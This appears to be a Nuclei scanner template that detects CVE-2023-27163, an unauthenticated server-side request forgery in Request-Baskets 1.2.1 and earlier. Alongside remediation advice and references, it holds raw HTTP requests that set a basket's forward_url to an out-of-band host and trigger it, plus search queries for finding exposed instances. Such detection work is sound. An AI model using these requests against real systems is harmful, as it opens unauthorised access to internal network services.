id: CVE-2023-27163 info: name: Request-Baskets <= 1.2.1 - Server Side Request Forgery author: Jaenact severity: medium description: | Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket. impact: | Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks. remediation: | Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability. reference: - https://github.com/darklynx/request-baskets - https://hub.docker.com/r/darklynx/request-baskets - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424 - https://nvd.nist.gov/vuln/detail/CVE-2023-27163 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N cvss-score: 6.5 cve-id: CVE-2023-27163 epss-score: 0.9332 epss-percentile: 0.99819 cwe-id: CWE-918 cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: darklynx product: request-baskets shodan-query: http.html:"Request-Baskets" fofa-query: body="Request-Baskets" tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln flow: http(1) && http(2) variables: bucketname: "{{rand_base(7)}}" http: - raw: - | POST /api/baskets/{{bucketname}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/json { "forward_url": "http://{{interactsh-url}}", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250 } matchers: - type: dsl dsl: - 'status_code == 201' - 'contains(body, "token\":")' - 'contains(content_type, "application/json")' condition: and internal: true - raw: - | GET /{{bucketname}} HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: interactsh_protocol words: - "http" # digest: 4a0a0047304502204ce6e91e61d875c7b378150f096a8c96cc533bd01eb17e13accc081cfe075d52022100b0db65ca822e2fe7dd7dd6c16844ad8b494109ad1439aaa14687be5f6533231e:922c64590222798bb761d5b6d8e72950